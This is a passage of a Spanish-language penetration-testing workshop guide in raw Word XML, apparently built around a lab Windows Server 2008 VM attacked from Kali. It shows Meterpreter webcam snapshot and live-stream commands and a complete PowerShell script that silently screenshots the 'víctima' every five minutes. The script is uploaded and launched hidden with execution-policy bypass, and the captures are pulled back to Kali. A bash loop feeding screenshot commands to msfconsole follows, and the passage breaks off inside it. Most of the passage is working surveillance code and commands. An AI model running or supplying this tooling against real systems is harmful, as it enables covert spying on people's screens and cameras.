          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Guarda una imagen .jpeg en el directorio actual de Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.3 Stream de video en vivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; webcam_stream</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Abre un stream MJPEG en el browser de Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Ctrl+C para detenerlo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.4 Configuración opcional: Passthrough de cámara USB en VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para que win2k8 detecte la cámara del host:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Instalar el Extension Pack de VirtualBox (si no está instalado) — incluye soporte USB 2.0/3.0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Con win2k8 APAGADA: Configuración → USB → Agregar filtro → seleccionar la cámara web del host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Encender win2k8 — Windows debería detectar la cámara y solicitarle drivers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ejecutar nuevamente webcam_list en Meterpreter — ahora debería aparecer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="6272A4" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Actividad 5 — Script de Capturas Automáticas cada 5 Minutos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subiremos un script de PowerShell a la víctima que toma capturas de pantalla automáticamente cada 5 minutos y las almacena localmente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1 Crear el script en Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea el archivo captura_pantalla.ps1 en Kali con el siguiente contenido:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nano /tmp/captura_pantalla.ps1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Contenido del script:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Script: captura_pantalla.ps1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Ejecutar en el sistema víctima desde Meterpreter</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$carpeta = "C:\screenshots"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if (-not (Test-Path $carpeta)) { New-Item -ItemType Directory -Path $carpeta | Out-Null }</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Add-Type -AssemblyName System.Windows.Forms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Add-Type -AssemblyName System.Drawing</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while ($true) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    $ts = Get-Date -Format "yyyyMMdd_HHmmss"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    $archivo = "$carpeta\screen_$ts.png"</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    $pantalla = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    $bmp = New-Object System.Drawing.Bitmap($pantalla.Width, $pantalla.Height)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    $g   = [System.Drawing.Graphics]::FromImage($bmp)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    $g.CopyFromScreen($pantalla.Location, [System.Drawing.Point]::Empty, $pantalla.Size)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    $bmp.Save($archivo, [System.Drawing.Imaging.ImageFormat]::Png)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    $g.Dispose()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    $bmp.Dispose()</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    Write-Host "Captura guardada: $archivo"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    Start-Sleep -Seconds 300   # 5 minutos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.2 Subir el script a la víctima via Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; upload /tmp/captura_pantalla.ps1 C:\\Windows\\Temp\\captura_pantalla.ps1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># [*] uploading  : /tmp/captura_pantalla.ps1 -&gt; C:\Windows\Temp\captura_pantalla.ps1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># [*] uploaded   : /tmp/captura_pantalla.ps1 -&gt; C:\Windows\Temp\captura_pantalla.ps1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.3 Ejecutar el script en la víctima (en segundo plano)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; shell</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 Crear la carpeta de destino</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; mkdir C:\screenshots</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 Ejecutar en background con Start-Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; powershell -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList '-ExecutionPolicy Bypass -File C:\Windows\Temp\captura_pantalla.ps1' -WindowStyle Hidden"</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C:\Windows\system32&gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.4 Verificar que las capturas se están generando</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esperar unos momentos y luego verificar desde Meterpreter:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32&gt; dir C:\screenshots</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Deben aparecer archivos screen_YYYYMMDD_HHmmss.png</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C:\Windows\system32&gt; exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.5 Descargar las capturas a Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; download C:\\screenshots\\*.png /tmp/capturas_victima/</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3B82F6" w:sz="4"/>
              <w:left w:val="single" w:color="3B82F6" w:sz="16"/>
              <w:bottom w:val="single" w:color="3B82F6" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="EFF6FF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1D4ED8"/>
              </w:rPr>
              <w:t xml:space="preserve">ℹ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="1D4ED8"/>
              </w:rPr>
              <w:t xml:space="preserve">El script corre como proceso hijo de PowerShell en background. Si apagas la VM, el proceso se detiene. Para persistencia real usarías el registro o una tarea programada (fuera del alcance de este taller).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.6 Alternativa: captura desde Kali con Meterpreter en loop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Si prefieres no subir nada a la víctima, puedes hacer el loop desde Kali:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># En una terminal de Kali (fuera de msfconsole), crear este script:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">cat &gt; /tmp/loop_screenshot.sh &lt;&lt; 'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir -p /tmp/screenshots</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">while true; do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    TS=$(date +%Y%m%d_%H%M%S)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    echo "screenshot -v false -p /tmp/screenshots/screen_${TS}.jpeg" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      | msfconsole -q --resource /dev/stdin 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    sleep 300</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:after="40" w:before="40"/>
        <w:ind w:left="431"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
